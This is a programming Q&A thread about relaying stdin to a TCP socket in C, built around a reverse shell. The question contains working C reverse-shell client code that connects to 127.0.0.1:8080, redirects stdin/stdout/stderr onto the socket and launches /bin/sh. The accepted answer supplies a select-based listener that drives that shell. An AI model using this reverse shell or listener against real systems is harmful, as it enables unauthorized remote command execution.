# Streaming stdin to a socket

Tags: c, sockets, std, telnet, netcat

Within Python 3 I can utilize the `telnetlib`'s library to use/import the method `interact` which can allow me to stream `stdin` to a `socket` passed to the `interact` method. Additionally `netcat` provides similar features (except being able to programmatically pass a `socket` within Python 3 of course) for instance: `nc -nvlp 8080`.

My questions are:

Is there a way to programmatically replicate the behavior of `telnetlib`'s `interact` method/streaming the `stdin` stream to a given `socket` within C? Or is this process convoluted? If it is simplistic, how could the `interact` method's logic be replicated within C?

For instance say I was running a simple client C reverse shell program similar to SSH that uses `dup2` to stream `stdin`, `stdout`, `stderr` to a duplicated socket `file descriptor`. How would I be able to communicate with this client programmatically within C?

Example C client I am trying to communicate with programmatically:

```
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#define REMOTE_ADDR "127.0.0.1"
#define REMOTE_PORT 8080

int main(int argc, char *argv[])
{
    struct sockaddr_in sa;
    int s;

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
    sa.sin_port = htons(REMOTE_PORT);

    s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));

    for (int i=0; i<3; i++)
           dup2(s, i);

    execve("/bin/sh", 0, 0);
    return 0;
}
```

To summarize: I am basically trying to communicate with the provided client programmatically within C.

Comment: Yes, you read from stdin, and you write to the socket. Then you read from the stdin and write to the socket again. Repeat until the cows come home.

Comment: @ty_c0der - Judging from your _Example C client_, you don't actually want to use the Telnet protocol, right?

Comment: Python's `telnetlib` library offers the method `interact` I want to replicate the functionality of this method, similarly, if not the same as `netcat`'s ability to stream input streams to a socket. I'm willing to use anything that works.

Comment: i.e I'm trying to replicate this command within C `nc -nvlp 8080`

Comment: Are you sure you want `nc -l` not just `nc`? `I am trying to communicate with programmatically` You do not cehck errors. How do you know `socket` succeded? Or `connect`? I do not understand - maybe you want to write your own `telnet 127.0.0.1 8080`? You want to _connect_ to port 8080 or start listening on port 8080? Why do you run `execve("/bin/sh")` ? Why not just `while ((c=getchar()) != EOF) { write(s, &c, 1); }`?

Comment: Listen on port 8080 and communicate with a socket that connects via the client example code I provided. The code is a reverse shell my aim is to stream `stdin` to the reverse shell socket and print the std(err,out,in) to the server's `stdout`.

Comment: Because it's a reverse shell (like ssh) just to experiment with streaming stdin correctly.

Comment: Writing such a program is too big for a stackoverflow quetion. I suggest to research how to write a http server in C - there are endless examples on github.

Comment: i don't need a http server I just need to know how to communicate with the client I provided programmatically within C.

Comment: If you can find any snippets of code that help me understand how to achieve this it would be awesome if you could post them.

Answer (score 0, accepted):

> I am basically trying to communicate with the provided client programmatically within C.

A program which does what you want needn't be big; here's a simple example:

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 8080

int main(int argc, char *argv[])
{
    struct sockaddr_in sa;
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = INADDR_ANY;
    sa.sin_port = htons(PORT);
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) perror("bind"), exit(1);
    listen(s, 0);
    int t = accept(s, NULL, NULL);
    if (t < 0) perror("accept"), exit(1);
    fd_set fds, fdr;
    FD_ZERO(&fds);
    FD_SET(0, &fds);    // add STDIN to the fd set
    FD_SET(t, &fds);    // add connection to the fd set
    while (fdr = fds, select(t+1, &fdr, NULL, NULL, NULL) > 0)
    {   char buf[BUFSIZ];
        if (FD_ISSET(0, &fdr))
        {   // this is the user's input
            size_t count = read(0, buf, sizeof buf);
            if (count > 0) write(t, buf, count);
            else break; // no more input from user
        }
        if (FD_ISSET(t, &fdr))
        {   // this is the client's output or termination
            size_t count = read(t, buf, sizeof buf);
            if (count > 0) write(1, buf, count);
            else break; // no more data from client
        }
    }
}
```

The key part is the `select` loop which checks for STDIN or the socket connection to be readable and copies the read data to the other side.

Comment: Voila! This works perfectly, exactly what I needed to learn!

Comment: Out of curiosity does this work in a reverse manner, for instance connecting to a bind tcp reverse shell?

Comment: Yes, the `select` loop works independent of how the connection was established.